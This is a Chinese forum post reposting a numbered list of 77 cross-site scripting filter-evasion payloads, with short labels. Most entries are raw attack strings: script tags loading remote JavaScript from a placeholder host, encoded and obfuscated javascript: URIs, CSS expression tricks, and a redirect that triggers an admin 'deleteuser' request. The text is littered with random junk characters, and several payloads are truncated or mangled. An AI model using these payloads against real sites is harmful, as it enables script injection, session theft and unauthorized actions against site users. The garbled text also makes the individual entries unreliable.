貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
. [- v' m7 b# O: Z$ Y& B$ E
. q6 V( q) u" s% n (1)普通的XSS JavaScript注入8 U% G; S" W D J3 ]0 {
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) B+ z# `5 n' f7 w Q( S! V) Q/ c, s6 V
1 k m- x5 {: ?% s$ U6 e# }% M
(2)IMG标签XSS使用JavaScript命令
- P1 }+ k: F8 | <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
: F8 [5 G( b l( Q' d/ T3 k$ T4 i: @* }6 Z. ?5 p
(3)IMG标签无分号无引号7 |+ x+ S- E* I2 W _
<IMG SRC=javascript:alert(‘XSS’)>
% T% O" O: ^3 D0 d* D% B% O- M5 M) U C( |/ |
(4)IMG标签大小写不敏感 Z% K# o9 G+ b- y3 z: i
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>) r- [2 P; m- u7 o- ~
8 d K7 P- g$ K v- [ (5)HTML编码(必须有分号)1 w1 ~# U4 c0 `0 n
<IMG SRC=javascript:alert(“XSS”)>: _, E6 h' l9 B5 }) Z4 N9 O& {$ @
6 E* [- M* ~0 g; p) W% {5 i
(6)修正缺陷IMG标签
3 K( O2 @( v- T% L <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
" x# Q& B# n+ V
) A- T5 k: _" p: p/ X* t) l; N( \3 I/ F (7)formCharCode标签(计算器)1 F7 }, g3 X5 m1 E; _* ?
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>1 H8 i Q( u; g! B# U8 Q7 v4 l
/ ?# Z @" c5 @/ B, L
(8)UTF-8的Unicode编码(计算器)+ b' F! B0 _. F6 Q! b* t
<IMG SRC=jav..省略..S')>
& x) _6 l" V& T! T8 |& {
t# a/ C& ~! E1 {% g* } (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
# A2 g& V" H4 F3 w! y- {( ^! Q/ x6 x <IMG SRC=jav..省略..S')>
( j3 Q2 M3 e& p, r/ ?5 m0 {) [- n. Q: ?- S+ q. l
(10)十六进制编码也是没有分号(计算器)# ~2 ~# Q9 n. w
<IMG SRC=java..省略..XSS')>
* u7 r9 _/ F: S4 G! ^
4 E9 I' X4 J* g0 u7 \/ w% b (11)嵌入式标签,将Javascript分开, v) {. S2 H! y9 d* p# j
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! a" Y3 _) P3 ~. V! a: o. r6 U& S# H3 F) D# m; i1 ~- U g/ [+ r+ c
(12)嵌入式编码标签,将Javascript分开
P2 E' U' V; w' `( x, O. } <IMG SRC=”jav ascript:alert(‘XSS’);”>
% b0 @7 K3 {5 G# S) E' `+ e2 k( `# s( Y* J* o# @2 N$ x8 J. J/ J; h
(13)嵌入式换行符' f; g5 D+ w7 }( M( h U8 M P" ~
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, X9 c1 c/ L: S, F* \+ y
% O" O9 X/ f$ A. {& h3 w) s (14)嵌入式回车9 y- M) g' o4 c% [- c& c8 b$ P6 U
<IMG SRC=”jav ascript:alert(‘XSS’);”>; z+ w; i, R4 Z2 @5 [
2 j0 X7 i/ b- `3 W$ Z (15)嵌入式多行注入JavaScript,这是XSS极端的例子' Q. V/ }. N/ z+ A, D9 s- |' o
<IMG SRC=”javascript:alert(‘XSS‘)”>$ r8 N U! o6 L7 ~, L+ L( C' a% o
4 k$ s: J0 C3 h+ _. }/ w5 S (16)解决限制字符(要求同页面): u) ~5 Y9 K7 _ K4 M" s9 ]
<script>z=’document.’</script>
2 K6 Z) V' X0 Y) x+ w <script>z=z+’write(“‘</script>
1 W0 \# o- q5 f( N) e" _ <script>z=z+’<script’</script>
# x# B0 k' i; u% s/ |* B' c <script>z=z+’ src=ht’</script>
# {. Y$ ?. ~' h/ [! U3 K <script>z=z+’tp://ww’</script>5 @+ e( ~) }) s' G6 Q1 s! }7 i
<script>z=z+’w.shell’</script>2 }+ d7 ^: z0 |' L( \
<script>z=z+’.net/1.’</script>$ ?6 T. Q. `& ^' y) _
<script>z=z+’js></sc’</script>% O4 l" M! ]7 d! T' e. z
<script>z=z+’ript>”)’</script>
9 I2 R1 l! _% ^ <script>eval_r(z)</script>- ?- [* }8 K" f; l$ r: |
4 c! S% [8 s( l& I/ U# U
(17)空字符2 [# E& z$ n3 }) U8 \$ s
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 v; Z$ V3 Z/ I9 U: O# o
5 t1 H+ T/ l5 `/ S (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用3 t3 {% Y9 }6 U9 D* H$ i
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
5 _' k. Q" L- B" P- x3 p$ P: x) M' R
(19)Spaces和meta前的IMG标签
1 `2 Z/ A: t1 D# B/ X1 I <IMG SRC=” � javascript:alert(‘XSS’);”>* a( m, n8 X, {
' z# o- S# T0 a" z( f# ^- `6 X
(20)Non-alpha-non-digit XSS% a# b, X1 o) U2 }1 B
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ @/ z/ c' X2 {& R s6 H$ Q3 ~5 }, V
m% @9 ~3 p. l2 g
(21)Non-alpha-non-digit XSS to 25 I+ @4 m& Q- | N1 s8 U- Q6 v9 n
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
0 D& {+ E# L' p# J2 W- \! a0 ]. k, L/ C$ V0 h' C/ |$ j7 g1 b6 G/ y
(22)Non-alpha-non-digit XSS to 34 y& V! T5 n/ G3 q
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% U) Z7 i* [9 E2 Y E
e7 h* T$ C+ A ` (23)双开括号
3 e, ]8 v# J1 S0 y3 C3 i; v& R8 J+ r <<SCRIPT>alert(“XSS”);//<</SCRIPT>
. u, M; c2 M6 k: y, }! R4 p% y) \. @" I. L$ X O0 [
(24)无结束脚本标记(仅火狐等浏览器)
4 I1 K/ d7 u+ a ~) f$ g7 V" F <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>* y; M; r* L) W0 Y4 V5 F2 W1 [* a
! R3 t4 y6 h. \. M (25)无结束脚本标记2
# z3 Q' e* n/ F) g. b <SCRIPT SRC=//3w.org/XSS/xss.js>
3 A6 d1 q& X# x# t6 S @, {$ ?) g' \
(26)半开的HTML/JavaScript XSS/ G, p7 |/ b. ]8 Q: l: h
<IMG SRC=”javascript:alert(‘XSS’)”0 }$ T8 c$ L9 ?) i3 y
# n+ Y+ y8 c" Q" M5 s, N
(27)双开角括号
4 r( f3 ^) J$ J& @' n <iframe src=http://3w.org/XSS.html <
2 `' W; X6 A0 J, Q
8 _. L$ Y$ K9 O- z. F* ^ (28)无单引号 双引号 分号
0 i6 C$ J# Z. @/ | <SCRIPT>a=/XSS/
% |( N& C, R7 n- I1 X6 H# @ alert(a.source)</SCRIPT>
, h1 j T9 d7 Y: \ r: k: u. _9 o( j4 M
(29)换码过滤的JavaScript
* j5 p \' r9 M) Q3 y* G2 C& s \”;alert(‘XSS’);//
) m( f* M2 L# d! i
5 |. I, l( R" d# n* E (30)结束Title标签. |4 d" N( n" u2 b6 {0 f% P
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>9 \ i8 ?3 k4 c6 [5 e4 w$ y$ s
' ?4 v8 o4 h; B
(31)Input Image
* }6 G& l( V! _) I <INPUT SRC=”javascript:alert(‘XSS’);”>
$ ^+ o" M, ?$ E- J; ]
# W4 D0 m0 x2 i. S9 o% i' E% W (32)BODY Image
' U7 y' o {% F4 m: t; l <BODY BACKGROUND=”javascript:alert(‘XSS’)”>% h9 B1 B: K+ g4 T1 t2 v
2 \: G& B; e$ S) L j (33)BODY标签
# l' t4 R! {% S <BODY(‘XSS’)>* f6 f# ]* {( U
7 Q% b# p, y! I: N: q f; ?
(34)IMG Dynsrc# b/ p$ \3 u+ c/ o; S7 y5 R
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
& E, e6 U7 w6 H1 F4 K( k
% |! X; `# z0 |* w) r+ E: j0 ? (35)IMG Lowsrc
4 Q5 b' L3 J4 ]3 @$ y7 ?8 ` <IMG LOWSRC=”javascript:alert(‘XSS’)”># x5 \1 P% s$ c5 a6 h% a+ K* q
$ B* o% M1 m# D" I/ f2 Z (36)BGSOUND. o/ d) T5 k2 g- j+ [
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
p6 Y5 d9 r+ X* C2 o+ p7 d2 `9 P, y
% O6 t9 I& |- D" O3 V (37)STYLE sheet+ r6 E0 v9 U! |5 O2 J
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
6 K% m' l* [0 u0 T3 {1 v( N2 E# i7 {+ ^. k$ W% w! T" C
(38)远程样式表$ L2 d1 R! m) b! W$ E
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>+ s' n+ R; y) V5 L/ b K8 R
) ?) F6 l( R8 }; o* j (39)List-style-image(列表式)9 D9 |* a, ^3 f5 ^" ]9 r8 l
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; `; e% E2 o8 u7 M' ~" Z
7 g( Q: g9 w( o8 d; P( _# N (40)IMG VBscript
: V( ]! R) @ W9 i( o# r <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS5 n, \1 L# @. {5 Z9 f& Y( Y; `3 c
7 ^7 d1 G$ f p* b- p" ]" F* f
(41)META链接url
$ D6 U3 x L6 U N/ v! G <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>* J) P* ]/ V$ S4 W' I, I
8 W$ H u) Q% y( f7 ?; e6 C6 J1 z
(42)Iframe
6 r) F' h4 u9 h' I <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>$ V& m% F4 y* v! t: f& y* i, b e" v9 C
% s) D/ I8 ?+ u8 Y7 N' K& e' C (43)Frame
0 g" Z' H; j: X <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>* Y; G2 A+ M# ~- V" L
( `9 _: R) ]5 }7 j
(44)Table
1 d6 T+ A# I8 A# O& X' M <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>6 m4 _' v* {" \2 N4 {+ F" w
0 X# u9 L: o. E; r0 k; W5 D
(45)TD W S0 S$ W* M s$ h
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>: f V1 O! c' B* P# N, x5 ?3 M0 d
; l( d5 w$ d0 ~6 Y" G (46)DIV background-image" c* o" S7 m+ {, G
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
4 D5 s: g9 A \2 C9 T) p# y
7 d* `9 E; U0 e7 a" S* | (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)& Z+ X! }6 \* p1 W
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>% `7 i* L% f. h* q9 F* X$ e
! g6 o, W6 O1 y. i3 u) k (48)DIV expression) w5 L( ^' S# D1 I5 \. x2 K( l
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>" U2 N$ p' F, y7 p+ b9 m
, m6 J( m2 t# k( G5 d
(49)STYLE属性分拆表达
' I+ ?( R+ ?2 H2 w! H: ?- J; S9 ~2 R' x <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ l# o3 t+ @" M
! G4 X1 i1 I! H/ D2 d# N (50)匿名STYLE(组成:开角号和一个字母开头)
( V& p2 A: Z4 l0 i) ^ <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>0 Y" q( @* W: v/ L
5 p+ r$ ~. @0 T+ r (51)STYLE background-image% t9 I' j: @$ Y8 d/ l
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>1 r0 ^; Y4 l6 i" ~7 S
; ]6 T7 W0 ^6 @9 F2 E& d
(52)IMG STYLE方式( E# n$ R9 J: ?% n4 k1 D
exppression(alert(“XSS”))’>2 l' V9 l, V7 r
0 Y" Z* a/ k, L! G3 C (53)STYLE background9 Y `0 j* y B% Y9 r( K: i
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
" ^, W, I" \! g1 N
9 E+ v' \( M% i: d# E; n+ N4 E (54)BASE
9 l3 m* ]7 D; a7 f <BASE HREF=”javascript:alert(‘XSS’);//”>0 O$ {2 D( |9 y7 R! C
' t3 P) C3 _- s x0 }5 D a
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS0 b: g6 [! _* R* J
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
) t9 x: g8 M0 k5 y' e5 d
( _2 o6 C% N8 E! ?( [2 J (56)在flash中使用ActionScrpt可以混进你XSS的代码
: z) U# p6 x( J! a* n a=”get”;% _7 p4 u6 M% z* v2 l( |% M
b=”URL(\”";/ }. ~& @: M: @$ j
c=”javascript:”;2 I3 k* s- C2 c1 [6 Y% _
d=”alert(‘XSS’);\”)”;- m. J" l& t2 e6 `0 p; R
eval_r(a+b+c+d);+ W7 @6 L+ M9 d* ]
' w+ W0 L$ B; r" V: ?; m4 T
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
& o5 S6 F# g, H" Y$ T" l <HTML xmlns:xss>
7 h: \% d4 m) L9 \# J <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>: K/ q. k+ Z+ r+ E$ E% G. `. q/ [
<xss:xss>XSS</xss:xss>6 A1 x8 @" `/ \3 F& L2 B) W
</HTML>. H" R& ~1 s. Q5 M( [
# K( t* @; c K& ~6 K# L (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
+ N' G/ b- A, i* D6 h) B <SCRIPT SRC=””></SCRIPT>' R0 r. C! p) d9 W' C6 z. P
, }, [7 U" P' Z* {# F
(59)IMG嵌入式命令,可执行任意命令& K& w. ?% q; ?+ A' J/ z4 I# [
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
2 x# Y l2 `4 _, G( Q2 O
+ f- z6 F4 E4 h" x, i& ^ (60)IMG嵌入式命令(a.jpg在同服务器)" l; f( |( }8 j2 @: U, ^: ]" a3 z
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser# s5 e; T' N" [. S
) e! F+ U* l* Y4 R
(61)绕符号过滤) ?' i5 t/ b: D* R8 }2 Y
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>) o T" [( h8 X0 [% y1 C
& B w. d2 d3 K% c
(62)
/ _& |9 W2 I3 S8 k) g <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 ~ Q% J. |( d4 d: ^! N9 |% ]: M2 z. G; b
(63)! }. f1 d. C3 _! g8 s) a
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>% Z, a! d& c( B+ B, e! n; N: G
; q& W7 o3 d, J# z% f4 W (64)
0 s2 o' g5 h* k* o, d% s <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
/ D4 ^9 T8 y! U1 ?$ B
, ^8 y; P& z& C( Q4 |/ p (65)
+ f3 `+ L, c' n <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>2 V: z+ |, k2 G- P
0 r' Z' d+ P: S6 t/ j4 @ (66)
0 |! w+ w0 k& d& }- n3 `- _ <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
% H. _) D" W! N2 n
) } k* U) n4 z+ ~! @0 Q, T8 M9 h (67)
% k6 t0 L5 s- v3 V <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
, E: `; S; r3 V8 R' f# R3 \
6 [9 c+ q8 Z; E: b3 d6 S) n+ j (68)URL绕行
+ M' |6 n, ?# d <A HREF=”http://127.0.0.1/”>XSS</A>- o- K1 B. t* `( ~
4 ?1 |5 X% U' Z& L @8 H (69)URL编码 J6 y9 j! q* F' t3 s7 |
<A HREF=”http://3w.org”>XSS</A>
6 I& _( b0 q/ x, ], s0 p8 k, G G9 P$ G1 d% m$ n1 |0 `
(70)IP十进制- K; J( F- `, V' T% |1 _1 h5 e* U3 \% J
<A HREF=”http://3232235521″>XSS</A>
; j3 Z3 z2 m% \* w2 G/ E! `
) V4 r/ S2 h: ^" W6 R# B (71)IP十六进制: r' }4 U! s- I+ P0 k
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
; k+ C' X9 _0 ]9 O+ u% q
1 { z u0 h0 J3 M. |( I& L- t (72)IP八进制" Z' P% G& e5 N& w0 C6 m
<A HREF=”http://0300.0250.0000.0001″>XSS</A>' I) ?! \2 P6 ^2 O' i
/ T! ~' q$ B- N3 T) E& G, w2 i: L
(73)混合编码
& L0 `9 }: t8 ]. W. L <A HREF=”h% c" J' j2 u9 |! n) W- {
tt p://6 6.000146.0×7.147/”">XSS</A>8 s; T0 d6 c% ?' {1 ?8 A
# R# R3 d W1 T; V* j (74)节省[http:]
2 M# ?4 B2 c4 j( ~( {) o+ V, y, H' e <A HREF=”//www.google.com/”>XSS</A>9 f* f& R9 B# ^% S$ t) K
6 P( |: q6 J* X- o2 M" Y( q' W) L4 i
(75)节省[www]) {8 H+ V4 p M8 M
<A HREF=”http://google.com/”>XSS</A>
: i7 ?, a! A( J4 ?) |1 h
. D" f0 K- W5 s* n. j2 C/ {6 z (76)绝对点绝对DNS
8 i' J% b/ |' k+ Y0 w$ V <A HREF=”http://www.google.com./”>XSS</A>: A; B; O$ [! {& {
! Y; J# @; @% u# P/ V( ?0 n& X (77)javascript链接
, g, ?9 Y# R$ _) l+ C2 l9 d% T+ c2 C <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对